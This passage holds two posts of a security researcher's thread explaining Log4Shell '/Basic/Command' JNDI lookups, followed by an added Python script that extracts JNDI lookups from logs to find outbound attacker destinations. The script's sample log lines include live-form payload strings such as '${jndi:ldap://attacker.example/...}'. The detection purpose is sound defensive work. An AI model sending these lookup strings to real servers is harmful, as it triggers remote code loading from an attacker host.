geech 👽👾
cybercrime connoisseur and synapse fanboy | hax @OSUSEC | tweets my own | @captainGeech@infosec.exchange
Dec 13, 2021
In a conversation I had with some folks yesterday about different exploit techniques for CVE-2021-44228, there was some confusion around how the /Basic/Command JNDI strings work. Let me break down what's happening here in a 🧵 (1/8)

#Log4Shell #log4j

First, these URIs are not a native part of the LDAP protocol. They aren't being handled by the JNDI lookup internally, and still require an outbound TCP connection to the attacker's malicious TCP server.

#Log4Shell #log4j

(2/8)
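
Because the path is not handled by the JNDI lookup itself, what a defender can act on is the outbound destination. The following is an added example, not code from the thread: it pulls JNDI lookups out of log lines and reduces them to the host and port the JVM would connect to. The log format, addresses, `PLACEHOLDER` path segment and function names are constructed for illustration, and it assumes the lookup appears un-obfuscated in the log.

```python
import re
from urllib.parse import urlsplit

# Matches an un-obfuscated JNDI lookup as it appears inside a logged string.
JNDI_RE = re.compile(r"\$\{jndi:([a-z]+://[^}\s]+)\}", re.IGNORECASE)

# Standard default ports, used when the lookup URL does not name one.
DEFAULT_PORTS = {"ldap": 389, "ldaps": 636, "rmi": 1099}


def extract_jndi_destinations(line):
    """Return one dict per JNDI lookup found in a single log line."""
    results = []
    for match in JNDI_RE.finditer(line):
        url = urlsplit(match.group(1))
        scheme = url.scheme.lower()
        results.append({
            "scheme": scheme,
            "host": url.hostname,
            "port": url.port or DEFAULT_PORTS.get(scheme),
            "path": url.path,  # opaque to the client; only the remote server interprets it
        })
    return results


def egress_targets(lines):
    """Group lookups by the (host, port) the JVM would open a TCP connection to."""
    targets = {}
    for line in lines:
        for hit in extract_jndi_destinations(line):
            targets.setdefault((hit["host"], hit["port"]), set()).add(hit["path"])
    return targets


# Constructed sample log lines (documentation addresses, placeholder paths).
SAMPLE_LOG = [
    '192.0.2.10 "GET / HTTP/1.1" 200 "${jndi:ldap://198.51.100.7:1389/Basic/Command/PLACEHOLDER}"',
    '192.0.2.11 "GET / HTTP/1.1" 200 "${jndi:ldap://198.51.100.7:1389/a}"',
    '192.0.2.12 "GET /health HTTP/1.1" 200 "curl/7.79"',
    '192.0.2.13 "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/Basic/Command/PLACEHOLDER}"',
]

if __name__ == "__main__":
    for (host, port), paths in egress_targets(SAMPLE_LOG).items():
        print(f"{host}:{port} <- {sorted(paths)}")
```

Lookups with different paths collapse onto the same `(host, port)` pair, which is the value to compare against firewall and proxy logs for outbound connections.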